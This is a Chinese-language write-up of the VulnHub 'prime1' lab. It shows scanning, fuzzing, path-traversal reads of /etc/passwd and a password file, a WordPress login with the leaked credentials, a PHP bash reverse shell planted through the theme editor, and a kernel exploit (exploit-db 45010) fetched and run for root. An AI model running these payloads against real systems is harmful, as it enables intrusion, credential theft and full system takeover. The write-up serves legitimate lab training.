prime1靶机渗透 (信息收集内核提权)

靶机信息

vulnhub靶机

prime1

主机发现

-sn 是scan and no port hack
只用于主机发现

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.50.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 02:25 EDT
Nmap scan report for 192.168.50.1
Host is up (0.00014s latency).
MAC Address: 00:50:56:F3:32:0E (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00012s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.153
Host is up (0.00011s latency).
MAC Address: 00:0C:29:5C:C7:58 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:F0:B2:27 (VMware)
Nmap scan report for 192.168.50.144
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.88 seconds

–min-rate 10000 -p- 用于以10000的速度扫描开放端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.153
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 02:27 EDT
Nmap scan report for bogon (192.168.50.153)
Host is up (0.00055s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:5C:C7:58 (VMware)Nmap done: 1 IP address (1 host up) scanned in 1.02 seconds

详细扫描
-sT 用tcp三次握手扫描，比起-sS的半连接能防止被发现
-sV 探测服务版本
-O 探测操作系统
-p 指定端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -O -sV -p22,80 192.168.50.153  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 02:29 EDT
Nmap scan report for bogon (192.168.50.153)
Host is up (0.00025s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:5C:C7:58 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.74 seconds

-sU 是udp扫描，tcp扫完用udp扫一下，一般没啥东西

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O -sV -p22,80 192.168.50.153 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 02:41 EDT
Nmap scan report for bogon (192.168.50.153)
Host is up (0.00027s latency).PORT   STATE  SERVICE VERSION
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:5C:C7:58 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hopOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.68 seconds

–script=vuln是漏洞脚本扫描，扫描时还应指定端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.168.50.153
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 02:44 EDT
Nmap scan report for bogon (192.168.50.153)
Host is up (0.00025s latency).PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|   /wordpress/: Blog
|_  /wordpress/wp-login.php: Wordpress login page.
MAC Address: 00:0C:29:5C:C7:58 (VMware)Nmap done: 1 IP address (1 host up) scanned in 68.75 seconds

访问一下
显示这个东西
在这里插入图片描述

爆破目录

工具
dirb
gobuster
feroxbuster

使用dirb

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.153-----------------
DIRB v2.22    
By The Dark Raver
-----------------START_TIME: Mon Sep  9 03:01:50 2024
URL_BASE: http://192.168.50.153/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612                                                          ---- Scanning URL: http://192.168.50.153/ ----
+ http://192.168.50.153/dev (CODE:200|SIZE:131)                                                                                                                                                         
+ http://192.168.50.153/index.php (CODE:200|SIZE:136)                                                                                                                                                   
==> DIRECTORY: http://192.168.50.153/javascript/                                                                                                                                                        
+ http://192.168.50.153/server-status (CODE:403|SIZE:279)                                                                                                                                               
==> DIRECTORY: http://192.168.50.153/wordpress/                                                                                                                                                         ---- Entering directory: http://192.168.50.153/javascript/ ----
==> DIRECTORY: http://192.168.50.153/javascript/jquery/                                                                                                                                                 ---- Entering directory: http://192.168.50.153/wordpress/ ----
+ http://192.168.50.153/wordpress/index.php (CODE:301|SIZE:0)                                                                                                                                           
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/                                                                                                                                                
==> DIRECTORY: http://192.168.50.153/wordpress/wp-content/                                                                                                                                              
==> DIRECTORY: http://192.168.50.153/wordpress/wp-includes/                                                                                                                                             
+ http://192.168.50.153/wordpress/xmlrpc.php (CODE:405|SIZE:42)                                                                                                                                         ---- Entering directory: http://192.168.50.153/javascript/jquery/ ----
+ http://192.168.50.153/javascript/jquery/jquery (CODE:200|SIZE:284394)                                                                                                                                 ---- Entering directory: http://192.168.50.153/wordpress/wp-admin/ ----
+ http://192.168.50.153/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                                                                  
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/css/                                                                                                                                            
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/images/                                                                                                                                         
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/includes/                                                                                                                                       
+ http://192.168.50.153/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                                                                                                                  
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/js/                                                                                                                                             
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/maint/                                                                                                                                          
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/network/                                                                                                                                        
==> DIRECTORY: http://192.168.50.153/wordpress/wp-admin/user/                                                                                                                                           ---- Entering directory: http://192.168.50.153/wordpress/wp-content/ ----
+ http://192.168.50.153/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                                                                                                                
==> DIRECTORY: http://192.168.50.153/wordpress/wp-content/plugins/                                                                                                                                      
==> DIRECTORY: http://192.168.50.153/wordpress/wp-content/themes/                                                                                                                                       
==> DIRECTORY: http://192.168.50.153/wordpress/wp-content/uploads/                                                                                                                                      ---- Entering directory: http://192.168.50.153/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.50.153/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.50.153/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.50.153/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.50.153/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.50.153/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.50.153/wordpress/wp-admin/network/ ----
+ http://192.168.50.153/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                                                                          
+ http://192.168.50.153/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                                                                          ---- Entering directory: http://192.168.50.153/wordpress/wp-admin/user/ ----
+ http://192.168.50.153/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                                                                             
+ http://192.168.50.153/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                                                                             ---- Entering directory: http://192.168.50.153/wordpress/wp-content/plugins/ ----
+ http://192.168.50.153/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                                                                        ---- Entering directory: http://192.168.50.153/wordpress/wp-content/themes/ ----
+ http://192.168.50.153/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                                                                         ---- Entering directory: http://192.168.50.153/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)-----------------
END_TIME: Mon Sep  9 03:02:18 2024
DOWNLOADED: 46120 - FOUND: 15

/dev是第一个暴露出来的目录
用curl看一下/dev

┌──(kali㉿kali)-[~]
└─$ sudo curl http://192.168.50.153/dev
[sudo] password for kali: 
hello,now you are at level 0 stage.In real life pentesting we should use our tools to dig on a web very hard.Happy hacking.

用-X指定扩展名爆破目录，爆破一些.txt的目录

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.153 -X .zip,.txt-----------------
DIRB v2.22    
By The Dark Raver
-----------------START_TIME: Mon Sep  9 03:06:44 2024
URL_BASE: http://192.168.50.153/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.zip,.txt) | (.zip)(.txt) [NUM = 2]-----------------GENERATED WORDS: 4612                                                          ---- Scanning URL: http://192.168.50.153/ ----
+ http://192.168.50.153/secret.txt (CODE:200|SIZE:412)                                                                                                                                                  -----------------
END_TIME: Mon Sep  9 03:06:49 2024
DOWNLOADED: 9224 - FOUND: 1

看看secret.txt说的啥

┌──(kali㉿kali)-[~]
└─$ sudo curl http://192.168.50.153/secret.txt  
Looks like you have got some secrets.Ok I just want to do some help to you. Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck 
Learn from here a basic tool with good usage for OSCP.https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web//see the location.txt and you will get your next move//

提示说对.php的内容做fuzz(模糊测试)

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.153 -X .php     -----------------
DIRB v2.22    
By The Dark Raver
-----------------START_TIME: Mon Sep  9 03:11:39 2024
URL_BASE: http://192.168.50.153/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]-----------------GENERATED WORDS: 4612                                                          ---- Scanning URL: http://192.168.50.153/ ----
+ http://192.168.50.153/image.php (CODE:200|SIZE:147)                                                                                                                                                   
+ http://192.168.50.153/index.php (CODE:200|SIZE:136)                                                                                                                                                   -----------------
END_TIME: Mon Sep  9 03:11:42 2024
DOWNLOADED: 4612 - FOUND: 2

wfuzz一下image.php
-c 高亮显示， -w 指定word list， --hh/hc/ha等用来忽略出现内容

┌──(kali㉿kali)-[/usr/share/wfuzz/wordlist/general]
└─$ sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 147 http://192.168.50.153/image.php?FUZZ=something
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************Target: http://192.168.50.153/image.php?FUZZ=something
Total requests: 951=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                 
=====================================================================Total time: 0
Processed Requests: 951
Filtered Requests: 951
Requests/sec.: 0

那么fuzz一下index.php，找到file参数，对应前文提示要找parameter

┌──(kali㉿kali)-[/usr/share/wfuzz/wordlist/general]
└─$ sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.50.153/index.php?FUZZ=something
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************Target: http://192.168.50.153/index.php?FUZZ=something
Total requests: 951=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                 
=====================================================================000000341:   200        7 L      19 W       206 Ch      "file"                                                                                                                                  Total time: 0.416232
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 2284.778

结果是找错了

┌──(kali㉿kali)-[/usr/share/wfuzz/wordlist/general]
└─$ sudo curl http://192.168.50.153/index.php?file                                                                       
<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>Do something better <br><br><br><br><br><br>you are digging wrong file</html>

但是没有完全找错，给get参数键file一个值

┌──(kali㉿kali)-[/usr/share/wfuzz/wordlist/general]
└─$ sudo curl http://192.168.50.153/index.php?file=location.txt
<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
</html>

提示使用secrettier360这个参数

scrot是个kali 的截图软件，用于记录，看来相当不错
对于截图文件的查看，使用xdg-open打开，相当牛

将这一参数用于两个php页面看一下，就是index.php和image.php

┌──(kali㉿kali)-[/usr/share/wfuzz/wordlist/general]
└─$ sudo curl http://192.168.50.153/index.php?secrettier360    
<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body></html>┌──(kali㉿kali)-[/usr/share/wfuzz/wordlist/general]
└─$ sudo curl http://192.168.50.153/image.php?secrettier360
<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br></html>

提示找到了参数parameter

小总结
信息收集到的内容
secret.txt
location.txt(提示使用参数secrettier360)
index.php
image.php
get参数 file
get参数 secrettier360

文件包含

没有头绪，如果考虑文件包含，那么get参数secrettier360的值可能为被包含文件的文件名
包含一下试试
secret.txt的内容似乎被包含进来了，这是巧合吗？再试一试其他文件

┌──(kali㉿kali)-[~]
└─$ curl http://192.168.50.153/image.php?secrettier360=secret.txt
<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>Looks like you have got some secrets.Ok I just want to do some help to you. Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck 
Learn from here a basic tool with good usage for OSCP.https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web//see the location.txt and you will get your next move//</html>

要是包含/etc/passwd的内容呢，果然成功了
saket用户的内容有点意思，是提示

┌──(kali㉿kali)-[~]
└─$ curl http://192.168.50.153/image.php?secrettier360=../../../../../../../../etc/passwd
<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
</html>

对于passwd的观察技巧如下
看交互环境：拥有 /bin/bash 等 shell 的用户优先考虑
看用户号：1000以上可能为自建账号，1000一下可能为系统功能性账号

访问/home/saket/password.txt，看一看内容
password.txt的内容是follow_the_ippsec
有点迷惑，因为image.php?secrettier360的文件内容提示finaly you got the right parameter，所以这个返回结果并不是说follow_the_ippsec是一个参数parameter，乐了

┌──(kali㉿kali)-[~]
└─$ curl http://192.168.50.153/image.php?secrettier360=../../../../../../../../../../../../home/saket/password.txt
<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>follow_the_ippsec
</html>

web后台

经由观察发现(目录爆破)，靶机部署了wordpress系统，通过路径来访问wordpress相关的页面

通过扫描器wpscan扫，它是专门用于wordpress的站的扫描器

扫一下用户 -e u 代表枚举用户
找到用户 victor

┌──(kali㉿kali)-[~]
└─$ sudo wpscan --url http://192.168.50.153/wordpress -e u
_________________________________________________________________          _______   _____\ \        / /  __ \ / ____|\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \\  /\  /  | |     ____) | (__| (_| | | | |\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.25@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[i] Updating the Database ...
[i] Update completed.[+] URL: http://192.168.50.153/wordpress/ [192.168.50.153]
[+] Started: Fri Sep 13 21:39:17 2024Interesting Finding(s):[+] Headers| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)| Found By: Headers (Passive Detection)| Confidence: 100%[+] XML-RPC seems to be enabled: http://192.168.50.153/wordpress/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:|  - http://codex.wordpress.org/XML-RPC_Pingback_API|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://192.168.50.153/wordpress/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] Upload directory has listing enabled: http://192.168.50.153/wordpress/wp-content/uploads/| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://192.168.50.153/wordpress/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:|  - https://www.iplocation.net/defend-wordpress-from-ddos|  - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).| Found By: Rss Generator (Passive Detection)|  - http://192.168.50.153/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>|  - http://192.168.50.153/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>[+] WordPress theme in use: twentynineteen| Location: http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/| Last Updated: 2024-07-16T00:00:00.000Z| Readme: http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/readme.txt| [!] The version is out of date, the latest version is 2.9| Style URL: http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4| Style Name: Twenty Nineteen| Style URI: https://wordpress.org/themes/twentynineteen/| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...| Author: the WordPress team| Author URI: https://wordpress.org/|| Found By: Css Style In Homepage (Passive Detection)|| Version: 1.4 (80% confidence)| Found By: Style (Passive Detection)|  - http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'[+] Enumerating Users (via Passive and Aggressive Methods)Brute Forcing Author IDs - Time: 00:00:00 <================================================================================================> (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:[+] victor| Found By: Author Posts - Display Name (Passive Detection)| Confirmed By:|  Rss Generator (Passive Detection)|  Author Id Brute Forcing - Author Pattern (Aggressive Detection)|  Login Error Messages (Aggressive Detection)[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register[+] Finished: Fri Sep 13 21:39:20 2024
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 16.91 KB
[+] Data Received: 21.992 MB
[+] Memory used: 182.77 MB
[+] Elapsed time: 00:00:02

wordpress小特性
搭建wordpress时，要创建用户。这个用户和系统的初始用户一般相同。这点考虑为网站搭建者的习惯

那就开始wordpress的渗透，访问wordpress后台路径
结合wpscan的扫到的用户victor，和用secrettier360参数读取的密码follow_the_ippsec
可知账号密码为
victor
follow_the_ippsec
在这里插入图片描述
确实登录进来了

在这里插入图片描述

里边逛逛

这里可能用到word press的特点

在插件 plugins 中可以上传 payload

在主题 appearance 中可以上传 payload

搭建者可能修复漏洞，这些上传点是可以优先尝试的

使用 zip 创建一个压缩文件，尝试上传 .zip 文件。结果失败
在这里插入图片描述

使用主题编辑，传个典中典的反弹 shell。不知道防火墙出方向的端口情况就用 443 吧

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/443 0>&1'"); ?>

请添加图片描述拿到shell, 路径是http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/secret.php
找这个路径可以通过网络搜索，也可通过wpscan得到

[+] WordPress theme in use: twentynineteen| Location: http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/| Last Updated: 2024-07-16T00:00:00.000Z| Readme: http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/readme.txt| [!] The version is out of date, the latest version is 2.9| Style URL: http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4| Style Name: Twenty Nineteen| Style URI: https://wordpress.org/themes/twentynineteen/| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...| Author: the WordPress team| Author URI: https://wordpress.org/|| Found By: Css Style In Homepage (Passive Detection)|| Version: 1.4 (80% confidence)| Found By: Style (Passive Detection)|  - http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

初级shell

请添加图片描述拿到初级shell后看一看系统的信息
whoami 查看系统用户
ip a 查看 ip 信息
sudo -l 查看当前用户权限

www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l
<ml/wordpress/wp-content/themes/twentynineteen$ sudo -l                      
Matching Defaults entries for www-data on ubuntu:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser www-data may run the following commands on ubuntu:(root) NOPASSWD: /home/saket/enc

pwd

www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ pwd
pwd
/var/www/html/wordpress/wp-content/themes/twentynineteen

ls /home
发现用户 victor 和 saket

www-data@ubuntu:/home/saket$ ls
ls
enc
password.txt
user.txt

在 saket 的家目录中发现，通过读user似乎拿到flag

www-data@ubuntu:/home/saket$ cat password.txt
cat password.txt
follow_the_ippsec
www-data@ubuntu:/home/saket$ cat user.txt
cat user.txt
af3c658dcf9d7190da3153519c003456
www-data@ubuntu:/home/saket$ ls -la
ls -la
total 36
drwxr-xr-x 2 root root  4096 Aug 31  2019 .
drwxr-xr-x 4 root root  4096 Aug 29  2019 ..
-rw------- 1 root root    20 Aug 31  2019 .bash_history
-rwxr-x--x 1 root root 14272 Aug 30  2019 enc
-rw-r--r-- 1 root root    18 Aug 29  2019 password.txt
-rw-r--r-- 1 root root    33 Aug 31  2019 user.txt
www-data@ubuntu:/home/saket$

uname -a 查看系统信息

Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

看一看crontab


www-data@ubuntu:/home/saket$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
@reboot                 bash /root/t.sh
#

提权

searchsploit 上找一下

┌──(kali㉿kali)-[~]
└─$ searchsploit Linux ubuntu 4.10.0-28                                  
------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                 |  Path
------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free           | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation  | linux/local/45010.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Es | linux/local/41760.txt
------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

把payload下载下来，使用-m下载, 若要直接查看就使用-x

┌──(kali㉿kali)-[~/testPrime1]
└─$ searchsploit Linux ubuntu -m 45010 
[!] Could not find EDB-ID #[!] Could not find EDB-ID #Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege EscalationURL: https://www.exploit-db.com/exploits/45010Path: /usr/share/exploitdb/exploits/linux/local/45010.cCodes: CVE-2017-16995Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/testPrime1/45010.c

在本机编译，或把.c传到靶机在靶机里编译

┌──(kali㉿kali)-[~/testPrime1]
└─$ gcc 45010.c -o 45010

在kali上用php开一个服务器

┌──(kali㉿kali)-[~/testPrime1]
└─$ sudo php -S 0:80                  
[sudo] password for kali: 
[Thu Sep 19 15:29:21 2024] PHP 8.2.21 Development Server (http://0:80) started
[Thu Sep 19 15:30:21 2024] 192.168.50.153:38036 Accepted
[Thu Sep 19 15:30:21 2024] 192.168.50.153:38036 [200]: GET /45010
[Thu Sep 19 15:30:21 2024] 192.168.50.153:38036 Closing
[Thu Sep 19 15:31:28 2024] 192.168.50.153:38038 Accepted
[Thu Sep 19 15:31:28 2024] 192.168.50.153:38038 [200]: GET /45010.c
[Thu Sep 19 15:31:28 2024] 192.168.50.153:38038 Closing

在shell上下载文件

www-data@ubuntu:/tmp$ wget http://192.168.50.147/45010
wget http://192.168.50.147/45010
--2024-09-19 00:30:10--  http://192.168.50.147/45010
Connecting to 192.168.50.147:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21616 (21K)
Saving to: '45010'0K .......... .......... .                               100%  514M=0s2024-09-19 00:30:10 (514 MB/s) - '45010' saved [21616/21616]www-data@ubuntu:/tmp$ wget http://192.168.50.147/45010.c
wget http://192.168.50.147/45010.c
--2024-09-19 00:31:17--  http://192.168.50.147/45010.c
Connecting to 192.168.50.147:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13176 (13K) [text/x-c]
Saving to: '45010.c'0K .......... ..                                         100%  426M=0s2024-09-19 00:31:17 (426 MB/s) - '45010.c' saved [13176/13176]

在 shell 上用 gcc 上编译

www-data@ubuntu:/tmp$ gcc 45010.c -o 45010-2
gcc 45010.c -o 45010-2
www-data@ubuntu:/tmp$ ls
ls
45010
45010-2
45010.c

增加执行权限chmod+x

www-data@ubuntu:/tmp$ chmod +x 45010-2
chmod +x 45010-2

拿到 root，搞定

www-data@ubuntu:/tmp$ ./45010-2
./45010-2
whoami
root
ip a
